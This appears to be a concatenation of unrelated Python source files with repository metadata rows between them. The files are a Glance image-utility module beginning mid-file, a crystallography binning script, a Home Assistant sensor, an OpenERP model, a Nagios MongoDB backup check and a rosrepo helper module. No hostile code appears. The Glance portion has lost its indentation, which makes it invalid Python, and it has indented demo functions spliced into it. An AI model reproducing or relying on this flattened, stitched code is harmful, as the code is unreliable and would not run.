:param iter: an iter which may also be readable
:param chunk_size: maximum size of chunk
"""
return chunkiter(iter, chunk_size) if hasattr(iter, 'read') else iter
def chunkiter(fp, chunk_size=65536):
"""
Return an iterator to a file-like obj which yields fixed size chunks
:param fp: a file-like object
:param chunk_size: maximum size of chunk
"""
while True:
chunk = fp.read(chunk_size)
if chunk:
yield chunk
else:
break
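# Hypothetical usage sketch (not part of the original module): chunkreadable()
# re-chunks objects that expose read() and leaves plain iterables untouched.
def _demo_chunking():
    import io
    fp = io.BytesIO(b'x' * 100)
    assert [len(c) for c in chunkreadable(fp, chunk_size=64)] == [64, 36]
    plain = iter([b'a', b'b'])
    assert chunkreadable(plain) is plain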
def cooperative_iter(iter):
"""
Return an iterator which schedules after each
iteration. This can prevent eventlet thread starvation.
:param iter: an iterator to wrap
"""
try:
for chunk in iter:
sleep(0)
yield chunk
except Exception as err:
with excutils.save_and_reraise_exception():
msg = _LE("Error: cooperative_iter exception %s") % err
LOG.error(msg)
def cooperative_read(fd):
"""
Wrap a file descriptor's read with a partial function which schedules
after each read. This can prevent eventlet thread starvation.
:param fd: a file descriptor to wrap
"""
def readfn(*args):
result = fd.read(*args)
sleep(0)
return result
return readfn
MAX_COOP_READER_BUFFER_SIZE = 134217728 # 128M seems like a sane buffer limit
class CooperativeReader(object):
"""
An eventlet thread friendly class for reading in image data.
When accessing data either through the iterator or the read method
we perform a sleep to allow a co-operative yield. When there is more than
one image being uploaded/downloaded this prevents eventlet thread
    starvation, i.e. allows all threads to be scheduled periodically rather than
having the same thread be continuously active.
"""
def __init__(self, fd):
"""
:param fd: Underlying image file object
"""
self.fd = fd
self.iterator = None
# NOTE(markwash): if the underlying supports read(), overwrite the
# default iterator-based implementation with cooperative_read which
# is more straightforward
if hasattr(fd, 'read'):
self.read = cooperative_read(fd)
else:
self.iterator = None
self.buffer = ''
self.position = 0
def read(self, length=None):
"""Return the requested amount of bytes, fetching the next chunk of
the underlying iterator when needed.
This is replaced with cooperative_read in __init__ if the underlying
fd already supports read().
"""
if length is None:
if len(self.buffer) - self.position > 0:
# if no length specified but some data exists in buffer,
# return that data and clear the buffer
result = self.buffer[self.position:]
self.buffer = ''
self.position = 0
return str(result)
else:
# otherwise read the next chunk from the underlying iterator
# and return it as a whole. Reset the buffer, as subsequent
# calls may specify the length
try:
if self.iterator is None:
self.iterator = self.__iter__()
return self.iterator.next()
except StopIteration:
return ''
finally:
self.buffer = ''
self.position = 0
else:
result = bytearray()
while len(result) < length:
if self.position < len(self.buffer):
to_read = length - len(result)
chunk = self.buffer[self.position:self.position + to_read]
result.extend(chunk)
# This check is here to prevent potential OOM issues if
# this code is called with unreasonably high values of read
# size. Currently it is only called from the HTTP clients
# of Glance backend stores, which use httplib for data
# streaming, which has readsize hardcoded to 8K, so this
                    # check should never fire. Regardless, it is still worth
                    # making the check, as the code may be reused elsewhere.
if len(result) >= MAX_COOP_READER_BUFFER_SIZE:
raise exception.LimitExceeded()
self.position += len(chunk)
else:
try:
if self.iterator is None:
self.iterator = self.__iter__()
self.buffer = self.iterator.next()
self.position = 0
except StopIteration:
self.buffer = ''
self.position = 0
return str(result)
return str(result)
def __iter__(self):
return cooperative_iter(self.fd.__iter__())
class LimitingReader(object):
"""
Reader designed to fail when reading image data past the configured
allowable amount.
"""
def __init__(self, data, limit):
"""
:param data: Underlying image data object
:param limit: maximum number of bytes the reader should allow
"""
self.data = data
self.limit = limit
self.bytes_read = 0
def __iter__(self):
for chunk in self.data:
self.bytes_read += len(chunk)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
else:
yield chunk
def read(self, i):
result = self.data.read(i)
self.bytes_read += len(result)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
return result
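# Hypothetical usage sketch: LimitingReader raises ImageSizeLimitExceeded once
# the cumulative bytes consumed exceed the configured limit.
def _demo_limiting_reader():
    reader = LimitingReader(iter([b'abc', b'def']), limit=4)
    try:
        list(reader)
    except exception.ImageSizeLimitExceeded:
        pass
    else:
        raise AssertionError('limit should have been enforced')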
def image_meta_to_http_headers(image_meta):
"""
    Transform a mapping of image metadata into a dict
of HTTP headers that can be fed to either a Webob
Request object or an httplib.HTTP(S)Connection object
:param image_meta: Mapping of image metadata
"""
headers = {}
for k, v in image_meta.items():
if v is not None:
if k == 'properties':
for pk, pv in v.items():
if pv is not None:
headers["x-image-meta-property-%s"
% pk.lower()] = six.text_type(pv)
else:
headers["x-image-meta-%s" % k.lower()] = six.text_type(v)
return headers
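# Hypothetical round-trip sketch; the metadata values below are invented.
def _demo_meta_headers():
    meta = {'name': 'cirros', 'size': 42, 'properties': {'arch': 'x86_64'}}
    headers = image_meta_to_http_headers(meta)
    assert headers['x-image-meta-name'] == u'cirros'
    assert headers['x-image-meta-property-arch'] == u'x86_64'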
def get_image_meta_from_headers(response):
"""
    Process HTTP headers from a supplied response that match
    the x-image-meta and x-image-meta-property prefixes and
    return a mapping of image metadata and properties
:param response: Response to process
"""
result = {}
properties = {}
if hasattr(response, 'getheaders'): # httplib.HTTPResponse
headers = response.getheaders()
else: # webob.Response
headers = response.headers.items()
for key, value in headers:
key = str(key.lower())
if key.startswith('x-image-meta-property-'):
field_name = key[len('x-image-meta-property-'):].replace('-', '_')
properties[field_name] = value or None
elif key.startswith('x-image-meta-'):
field_name = key[len('x-image-meta-'):].replace('-', '_')
if 'x-image-meta-' + field_name not in IMAGE_META_HEADERS:
msg = _("Bad header: %(header_name)s") % {'header_name': key}
raise exc.HTTPBadRequest(msg, content_type="text/plain")
result[field_name] = value or None
result['properties'] = properties
for key, nullable in [('size', False), ('min_disk', False),
('min_ram', False), ('virtual_size', True)]:
if key in result:
try:
result[key] = int(result[key])
except ValueError:
if nullable and result[key] == str(None):
result[key] = None
else:
extra = (_("Cannot convert image %(key)s '%(value)s' "
"to an integer.")
% {'key': key, 'value': result[key]})
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
            if result[key] is not None and result[key] < 0:
extra = _('Cannot be a negative value.')
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
for key in ('is_public', 'deleted', 'protected'):
if key in result:
result[key] = strutils.bool_from_string(result[key])
return result
def create_mashup_dict(image_meta):
"""
Returns a dictionary-like mashup of the image core properties
and the image custom properties from given image metadata.
:param image_meta: metadata of image with core and custom properties
"""
def get_items():
for key, value in six.iteritems(image_meta):
if isinstance(value, dict):
for subkey, subvalue in six.iteritems(
create_mashup_dict(value)):
if subkey not in image_meta:
yield subkey, subvalue
else:
yield key, value
return dict(get_items())
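# Hypothetical illustration: nested property dicts are flattened into the top
# level, and keys already present in the outer mapping are not overridden.
def _demo_mashup():
    meta = {'name': 'img', 'properties': {'os': 'linux', 'name': 'shadowed'}}
    assert create_mashup_dict(meta) == {'name': 'img', 'os': 'linux'}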
def safe_mkdirs(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def safe_remove(path):
try:
os.remove(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
class PrettyTable(object):
"""Creates an ASCII art table for use in bin/glance
Example:
ID Name Size Hits
--- ----------------- ------------ -----
122 image 22 0
"""
def __init__(self):
self.columns = []
def add_column(self, width, label="", just='l'):
"""Add a column to the table
:param width: number of characters wide the column should be
:param label: column heading
:param just: justification for the column, 'l' for left,
'r' for right
"""
self.columns.append((width, label, just))
def make_header(self):
label_parts = []
break_parts = []
for width, label, _ in self.columns:
# NOTE(sirp): headers are always left justified
label_part = self._clip_and_justify(label, width, 'l')
label_parts.append(label_part)
break_part = '-' * width
break_parts.append(break_part)
label_line = ' '.join(label_parts)
break_line = ' '.join(break_parts)
return '\n'.join([label_line, break_line])
def make_row(self, *args):
row = args
row_parts = []
for data, (width, _, just) in zip(row, self.columns):
row_part = self._clip_and_justify(data, width, just)
row_parts.append(row_part)
row_line = ' '.join(row_parts)
return row_line
@staticmethod
def _clip_and_justify(data, width, just):
# clip field to column width
clipped_data = str(data)[:width]
if just == 'r':
# right justify
justified = clipped_data.rjust(width)
else:
# left justify
justified = clipped_data.ljust(width)
return justified
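# Hypothetical usage mirroring the layout in the class docstring above.
def _demo_pretty_table():
    table = PrettyTable()
    table.add_column(3, label='ID', just='r')
    table.add_column(17, label='Name')
    table.make_header()                      # 'ID  Name...' plus a dashed rule
    assert table.make_row(122, 'image').startswith('122 image')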
def get_terminal_size():
def _get_terminal_size_posix():
import fcntl
import struct
import termios
height_width = None
try:
height_width = struct.unpack('hh', fcntl.ioctl(sys.stderr.fileno(),
termios.TIOCGWINSZ,
struct.pack('HH', 0, 0)))
except Exception:
pass
if not height_width:
try:
p = subprocess.Popen(['stty', 'size'],
shell=False,
stdout=subprocess.PIPE,
stderr=open(os.devnull, 'w'))
result = p.communicate()
if p.returncode == 0:
return tuple(int(x) for x in result[0].split())
except Exception:
pass
return height_width
def _get_terminal_size_win32():
try:
from ctypes import create_string_buffer
from ctypes import windll
handle = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
except Exception:
return None
if res:
import struct
unpack_tmp = struct.unpack("hhhhHhhhhhh", csbi.raw)
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = unpack_tmp
height = bottom - top + 1
width = right - left + 1
return (height, width)
else:
return None
def _get_terminal_size_unknownOS():
raise NotImplementedError
func = {'posix': _get_terminal_size_posix,
'win32': _get_terminal_size_win32}
height_width = func.get(platform.os.name, _get_terminal_size_unknownOS)()
if height_width is None:
raise exception.Invalid()
for i in height_width:
if not isinstance(i, int) or i <= 0:
raise exception.Invalid()
return height_width[0], height_width[1]
def mutating(func):
"""Decorator to enforce read-only logic"""
@functools.wraps(func)
def wrapped(self, req, *args, **kwargs):
if req.context.read_only:
msg = "Read-only access"
LOG.debug(msg)
raise exc.HTTPForbidden(msg, request=req,
content_type="text/plain")
return func(self, req, *args, **kwargs)
return wrapped
def setup_remote_pydev_debug(host, port):
error_msg = _LE('Error setting up the debug environment. Verify that the'
' option pydev_worker_debug_host is pointing to a valid '
'hostname or IP on which a pydev server is listening on'
' the port indicated by pydev_worker_debug_port.')
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(host,
port=port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(error_msg)
def validate_key_cert(key_file, cert_file):
try:
error_key_name = "private key"
error_filename = key_file
with open(key_file, 'r') as keyfile:
key_str = keyfile.read()
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key_str)
error_key_name = "certificate"
error_filename = cert_file
with open(cert_file, 'r') as certfile:
cert_str = certfile.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_str)
except IOError as ioe:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it."
" Error: %(ioe)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ioe': ioe})
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it. OpenSSL"
" error: %(ce)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ce': ce})
try:
data = str(uuid.uuid4())
digest = CONF.digest_algorithm
if digest == 'sha1':
LOG.warn('The FIPS (FEDERAL INFORMATION PROCESSING STANDARDS)'
' state that the SHA-1 is not suitable for'
' general-purpose digital signature applications (as'
' specified in FIPS 186-3) that require 112 bits of'
' security. The default value is sha1 in Kilo for a'
' smooth upgrade process, and it will be updated'
' with sha256 in next release(L).')
out = crypto.sign(key, data, digest)
crypto.verify(cert, out, data, digest)
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your key pair. "
"Please verify that cert %(cert_file)s and "
"key %(key_file)s belong together. OpenSSL "
"error %(ce)s") % {'cert_file': cert_file,
'key_file': key_file,
'ce': ce})
def get_test_suite_socket():
global GLANCE_TEST_SOCKET_FD_STR
if GLANCE_TEST_SOCKET_FD_STR in os.environ:
fd = int(os.environ[GLANCE_TEST_SOCKET_FD_STR])
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
if six.PY2:
sock = socket.SocketType(_sock=sock)
sock.listen(CONF.backlog)
del os.environ[GLANCE_TEST_SOCKET_FD_STR]
os.close(fd)
return sock
return None
def is_uuid_like(val):
"""Returns validation of a value as a UUID.
For our purposes, a UUID is a canonical form string:
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
"""
try:
return str(uuid.UUID(val)) == val
except (TypeError, ValueError, AttributeError):
return False
def is_valid_hostname(hostname):
"""Verify whether a hostname (not an FQDN) is valid."""
return re.match('^[a-zA-Z0-9-]+$', hostname) is not None
def is_valid_fqdn(fqdn):
"""Verify whether a host is a valid FQDN."""
    return re.match(r'^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', fqdn) is not None
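# Hypothetical checks for the two validators above: hostnames are bare labels,
# while FQDNs must end in an alphabetic TLD.
def _demo_host_validators():
    assert is_valid_hostname('node-01')
    assert not is_valid_hostname('node.example.org')
    assert is_valid_fqdn('node.example.org')
    assert not is_valid_fqdn('192.168.0.1')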
def parse_valid_host_port(host_port):
"""
Given a "host:port" string, attempts to parse it as intelligently as
possible to determine if it is valid. This includes IPv6 [host]:port form,
IPv4 ip:port form, and hostname:port or fqdn:port form.
Invalid inputs will raise a ValueError, while valid inputs will return
a (host, port) tuple where the port will always be of type int.
"""
try:
try:
host, port = netutils.parse_host_port(host_port)
except Exception:
raise ValueError(_('Host and port "%s" is not valid.') % host_port)
if not netutils.is_valid_port(port):
raise ValueError(_('Port "%s" is not valid.') % port)
# First check for valid IPv6 and IPv4 addresses, then a generic
# hostname. Failing those, if the host includes a period, then this
# should pass a very generic FQDN check. The FQDN check for letters at
# the tail end will weed out any hilariously absurd IPv4 addresses.
if not (netutils.is_valid_ipv6(host) or netutils.is_valid_ipv4(host) or
is_valid_hostname(host) or is_valid_fqdn(host)):
raise ValueError(_('Host "%s" is not valid.') % host)
except Exception as ex:
raise ValueError(_('%s '
'Please specify a host:port pair, where host is an '
'IPv4 address, IPv6 address, hostname, or FQDN. If '
'using an IPv6 address, enclose it in brackets '
'separately from the port (i.e., '
'"[fe80::a:b:c]:9876").') % ex)
return (host, int(port))
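# Hypothetical usage, assuming oslo.utils' documented parse_host_port()
# behaviour: accepted host forms come back as a (host, int port) tuple.
def _demo_parse_host_port():
    assert parse_valid_host_port('192.168.0.1:9292') == ('192.168.0.1', 9292)
    assert parse_valid_host_port('[fe80::a:b:c]:9876') == ('fe80::a:b:c', 9876)
    try:
        parse_valid_host_port('bad pair')
    except ValueError:
        pass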
try:
REGEX_4BYTE_UNICODE = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
# UCS-2 build case
REGEX_4BYTE_UNICODE = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
def no_4byte_params(f):
"""
    Decorator that rejects 4 byte unicode characters in
    dict keys/values and in string parameters
"""
def wrapper(*args, **kwargs):
def _is_match(some_str):
return (isinstance(some_str, six.text_type) and
REGEX_4BYTE_UNICODE.findall(some_str) != [])
def _check_dict(data_dict):
# a dict of dicts has to be checked recursively
for key, value in six.iteritems(data_dict):
if isinstance(value, dict):
_check_dict(value)
else:
if _is_match(key):
msg = _("Property names can't contain 4 byte unicode.")
raise exception.Invalid(msg)
if _is_match(value):
msg = (_("%s can't contain 4 byte unicode characters.")
% key.title())
raise exception.Invalid(msg)
for data_dict in [arg for arg in args if isinstance(arg, dict)]:
_check_dict(data_dict)
# now check args for str values
for arg in args:
if _is_match(arg):
msg = _("Param values can't contain 4 byte unicode.")
raise exception.Invalid(msg)
# check kwargs as well, as params are passed as kwargs via
# registry calls
_check_dict(kwargs)
return f(*args, **kwargs)
return wrapper
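# Hypothetical sketch of the decorator in action; _demo_store is an invented
# function, not a real registry call.
@no_4byte_params
def _demo_store(name=None):
    return name
def _demo_no_4byte():
    assert _demo_store(name=u'ok') == u'ok'
    try:
        _demo_store(name=u'\U0001F600')       # astral-plane emoji is rejected
    except exception.Invalid:
        pass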
def validate_mysql_int(*args, **kwargs):
"""
Make sure that all arguments are less than 2 ** 31 - 1.
This limitation is introduced because mysql stores INT in 4 bytes.
If the validation fails for some argument, exception.Invalid is raised with
appropriate information.
"""
max_int = (2 ** 31) - 1
for param in args:
if param > max_int:
msg = _("Value %(value)d out of range, "
"must not exceed %(max)d") % {"value": param,
"max": max_int}
raise exception.Invalid(msg)
for param_str in kwargs:
param = kwargs.get(param_str)
if param and param > max_int:
msg = _("'%(param)s' value out of range, "
"must not exceed %(max)d") % {"param": param_str,
"max": max_int}
raise exception.Invalid(msg)
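# Hypothetical sketch: positional and keyword values above 2 ** 31 - 1 raise.
def _demo_validate_mysql_int():
    validate_mysql_int(1, 2, size=3)          # within range, passes silently
    try:
        validate_mysql_int(limit=2 ** 31)
    except exception.Invalid:
        pass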
def stash_conf_values():
"""
Make a copy of some of the current global CONF's settings.
Allows determining if any of these values have changed
when the config is reloaded.
"""
conf = {}
conf['bind_host'] = CONF.bind_host
conf['bind_port'] = CONF.bind_port
    conf['tcp_keepidle'] = CONF.tcp_keepidle
conf['backlog'] = CONF.backlog
conf['key_file'] = CONF.key_file
conf['cert_file'] = CONF.cert_file
return conf
|
apache-2.0
| 29,378,260,714,325,270
| 34.078167
| 79
| 0.552059
| false
| 4.281625
| false
| false
| false
|
keitaroyam/yamtbx
|
cctbx_progs/dano_vs_d.py
|
1
|
1364
|
"""
Usage:
phenix.python dano_vs_d.py your.sca 20
"""
import iotbx.file_reader
from cctbx.array_family import flex
def run(hklin, n_bins):
for array in iotbx.file_reader.any_file(hklin).file_server.miller_arrays:
# skip if not anomalous intensity data
if not (array.is_xray_intensity_array() and array.anomalous_flag()):
print "skipping", array.info()
continue
# We assume that data is already merged
assert array.is_unique_set_under_symmetry()
# take anomalous differences
dano = array.anomalous_differences()
# process with binning
dano.setup_binner(n_bins=n_bins)
binner = dano.binner()
print "Array:", array.info()
print " dmax dmin nrefs dano"
for i_bin in binner.range_used():
        # selection for this bin. sel is a flex.bool object (list of True or False)
sel = binner.selection(i_bin)
# take mean of absolute value of anomalous differences in a bin
bin_mean = flex.mean(flex.abs(dano.select(sel).data()))
d_max, d_min = binner.bin_d_range(i_bin)
print "%7.2f %7.2f %6d %.2f" % (d_max, d_min, binner.count(i_bin), bin_mean)
# run()
if __name__ == "__main__":
import sys
hklin = sys.argv[1]
n_bins = int(sys.argv[2])
run(hklin, n_bins)
|
bsd-3-clause
| 3,833,057,630,944,875,500
| 31.47619
| 88
| 0.60044
| false
| 3.135632
| false
| false
| false
|
jamespcole/home-assistant
|
homeassistant/components/eight_sleep/binary_sensor.py
|
1
|
1832
|
"""Support for Eight Sleep binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_BINARY_SENSORS, DATA_EIGHT, NAME_MAP, EightSleepHeatEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['eight_sleep']
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the eight sleep binary sensor."""
if discovery_info is None:
return
name = 'Eight'
sensors = discovery_info[CONF_BINARY_SENSORS]
eight = hass.data[DATA_EIGHT]
all_sensors = []
for sensor in sensors:
all_sensors.append(EightHeatSensor(name, eight, sensor))
async_add_entities(all_sensors, True)
class EightHeatSensor(EightSleepHeatEntity, BinarySensorDevice):
"""Representation of a Eight Sleep heat-based sensor."""
def __init__(self, name, eight, sensor):
"""Initialize the sensor."""
super().__init__(eight)
self._sensor = sensor
self._mapped_name = NAME_MAP.get(self._sensor, self._sensor)
self._name = '{} {}'.format(name, self._mapped_name)
self._state = None
self._side = self._sensor.split('_')[0]
self._userid = self._eight.fetch_userid(self._side)
self._usrobj = self._eight.users[self._userid]
_LOGGER.debug("Presence Sensor: %s, Side: %s, User: %s",
self._sensor, self._side, self._userid)
@property
def name(self):
"""Return the name of the sensor, if any."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
async def async_update(self):
"""Retrieve latest state."""
self._state = self._usrobj.bed_presence
|
apache-2.0
| -4,521,372,871,055,284,700
| 28.548387
| 77
| 0.622817
| false
| 3.832636
| false
| false
| false
|
iw3hxn/LibrERP
|
purchase_order_version/models/inherit_purchase_order_line.py
|
1
|
2019
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class purchase_order_line(orm.Model):
_inherit = "purchase.order.line"
_columns = {
# 'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'purchase_line_copy_id': fields.many2one('purchase.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
defaults = defaults or {}
if context.get('versioning', False):
defaults['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, default, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
default = default or {}
if context.get('versioning', False):
default['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy(cr, uid, line_id, default, context)
|
agpl-3.0
| 2,852,159,605,738,768,400
| 43.866667
| 120
| 0.616642
| false
| 3.966601
| false
| false
| false
|
Tealium/nagios
|
files/default/plugins/check_mongodb_backup.py
|
1
|
6143
|
#!/usr/bin/env python
desc = """
Checks the status of the most recent MongoDB backup or, with the --snap option,
checks that the snapshots for the most recent backup were completed.
"""
import kazoo
from kazoo.client import KazooClient
from kazoo.client import KazooState
import yaml
import argparse
import time
from datetime import datetime
from datetime import timedelta
class Status(dict):
def __init__(self, name, code, msg):
self.name = name
self.code = code
self.msg = msg
def exit(self):
print "%s - %s" % (self.name, self.msg)
raise SystemExit(self.code)
class OK(Status):
def __init__(self,msg):
super(OK,self).__init__('OK', 0, msg)
class WARNING(Status):
def __init__(self,msg):
super(WARNING,self).__init__('WARNING', 1, msg)
class CRITICAL(Status):
def __init__(self,msg):
super(CRITICAL,self).__init__('CRITICAL', 2, msg)
class UNKNOWN(Status):
def __init__(self,msg):
super(UNKNOWN,self).__init__('UNKNOWN', 3, msg)
def state_listener(state):
    if state == KazooState.LOST:
        UNKNOWN("zookeeper connection state was lost").exit()
    elif state == KazooState.SUSPENDED:
        UNKNOWN("zookeeper connection state was suspended").exit()
    elif state == KazooState.CONNECTED:
        pass
def create_date_path(days_ago):
when = datetime.utcnow()
if days_ago:
delta = timedelta(days=days_ago)
when = when - delta
return when.strftime("/%Y/%m/%d")
def look4abort(zk, days_ago=None):
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
abort_node = day_node + '/' + str(hours[-1]) + '/ABORT'
if zk.exists(abort_node):
excuse = zk.retry(zk.get, abort_node)
return CRITICAL("found backup abort status: %s" % excuse[0])
else:
return OK('no abort during most recent backup')
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
def look4snaps(zk, days_ago=None):
import boto
import boto.ec2
import boto.utils
import chef
instance_id = boto.utils.get_instance_metadata()['instance-id']
if args.region:
region_spec = args.region
else:
region_spec = boto.utils.get_instance_identity()['document']['region']
chef_api = chef.autoconfigure()
node = chef.Node(instance_id)
my_app_env = node.attributes['app_environment']
bag = chef.DataBag('aws')
item = bag[my_app_env]
key_id = str(item['aws_access_key_id'])
key_secret = str(item['aws_secret_access_key'])
region = boto.ec2.get_region(region_spec, aws_access_key_id=key_id, aws_secret_access_key=key_secret)
conn = region.connect(aws_access_key_id=key_id, aws_secret_access_key=key_secret)
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
shards_parent_node = day_node + '/' + str(hours[-1]) + '/mongodb_shard_server'
if zk.exists(shards_parent_node):
shard_list = zk.retry(zk.get_children, shards_parent_node)
if len(shard_list) > 0:
msg = ''
err = 0
for shard in shard_list:
shard_data = zk.retry(zk.get, shards_parent_node + '/' + shard)
snaps = conn.get_all_snapshots(eval(shard_data[0]))
msg = msg + ", %s [" % shard
snap_text = ''
for snap in snaps:
if snap.status == 'error': err = 1
snap_text = snap_text + ", %s (%s)" % (str(snap), snap.status)
msg = msg + snap_text.strip(', ') + ']'
if err:
return CRITICAL(msg.strip(', '))
return OK(msg.strip(', '))
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4snaps(zk, 1)
if __name__ == '__main__':
gargle = argparse.ArgumentParser(prog = "check_mongodb_backup", description=desc,
usage='%(prog)s [options]',
formatter_class = argparse.RawDescriptionHelpFormatter)
gargle.add_argument('--prefix', dest="prefix", metavar="<path_prefix>", default='/backup/mongodb_cluster/',
help='ZooKeeper path prefix (default: /backup/mongodb_cluster/)')
gargle.add_argument('--cluster', dest="env", metavar="<cluster_id>", default='production',
help='MongoDB cluster name (default: production)')
gargle.add_argument('--config', dest='yaml', metavar="<config_file>",
help='ZooKeeper server list file (default: /etc/zookeeper/server_list.yml)',
default='/etc/zookeeper/server_list.yml')
gargle.add_argument('--region', metavar="<aws-region-spec>",
help='AWS region where the snapshots are stored (default: region of host instance)')
gargle.add_argument('--snaps', action='store_true',
help='check snapshots from most recent backup (default: False)')
args = gargle.parse_args()
try:
y = yaml.safe_load(open(args.yaml))
servers = ','.join("%s:%s" % (s['host'],s['port']) for s in y['zookeepers'])
zk = KazooClient(hosts=servers)
zk.start()
zk.add_listener(state_listener)
if args.snaps:
status = look4snaps(zk)
else:
status = look4abort(zk)
zk.remove_listener(state_listener)
zk.stop()
status.exit()
except Exception as e:
UNKNOWN("Error: %s" % e).exit()
|
apache-2.0
| 3,951,950,523,133,966,300
| 27.178899
| 110
| 0.608335
| false
| 3.480453
| false
| false
| false
|
fkie/rosrepo
|
src/rosrepo/util.py
|
1
|
6206
|
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import fcntl
import termios
import struct
import multiprocessing
import signal
from tempfile import mkstemp
from subprocess import Popen, PIPE
from yaml import load as yaml_load_impl, dump as yaml_dump_impl, YAMLError
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
def yaml_load(stream, Loader=SafeLoader):
return yaml_load_impl(stream, Loader=Loader)
def yaml_dump(data, stream=None, Dumper=SafeDumper, **kwargs):
return yaml_dump_impl(data, stream=stream, Dumper=Dumper, **kwargs)
class NamedTuple(object):
__slots__ = ()
def __init__(self, *args, **kwargs):
slots = self.__slots__
for k in slots:
setattr(self, k, kwargs.get(k))
if args:
for k, v in zip(slots, args):
setattr(self, k, v)
def __str__(self):
clsname = self.__class__.__name__
values = ", ".join("%s=%r" % (k, getattr(self, k)) for k in self.__slots__)
return "%s(%s)" % (clsname, values)
__repr__ = __str__
def __getitem__(self, item):
return getattr(self, self.__slots__[item])
def __setitem__(self, item, value):
return setattr(self, self.__slots__[item], value)
def __len__(self):
return len(self.__slots__)
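# Hypothetical usage sketch for the slot-based NamedTuple helper above;
# _Point is an invented example class.
class _Point(NamedTuple):
    __slots__ = ('x', 'y')
def _demo_named_tuple():
    p = _Point(1, y=2)
    assert (p.x, p[1], len(p)) == (1, 2, 2)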
try:
iteritems = dict.iteritems
except AttributeError:
iteritems = dict.items
class UserError(RuntimeError):
pass
def is_deprecated_package(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated is not None
def deprecated_package_info(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated.content if deprecated is not None else None
def path_has_prefix(path, prefix):
p = os.path.normpath(path)
q = os.path.normpath(prefix)
if p == q:
return True
head, tail = os.path.split(p)
while tail != "":
if head == q:
return True
head, tail = os.path.split(head)
return False
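# Hypothetical checks: matching is done on path components, so '/a/b' is a
# prefix of '/a/b/c' but not of '/a/bc'.
def _demo_path_prefix():
    assert path_has_prefix('/a/b/c', '/a/b')
    assert not path_has_prefix('/a/bc', '/a/b')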
def has_package_path(obj, paths):
for path in paths:
if path_has_prefix(path, obj.workspace_path if hasattr(obj, "workspace_path") else obj):
return True
return False
def env_path_list_contains(path_list, path):
if path_list not in os.environ:
return False
paths = os.environ[path_list].split(os.pathsep)
return path in paths
def makedirs(path):
if not os.path.isdir(path):
os.makedirs(path)
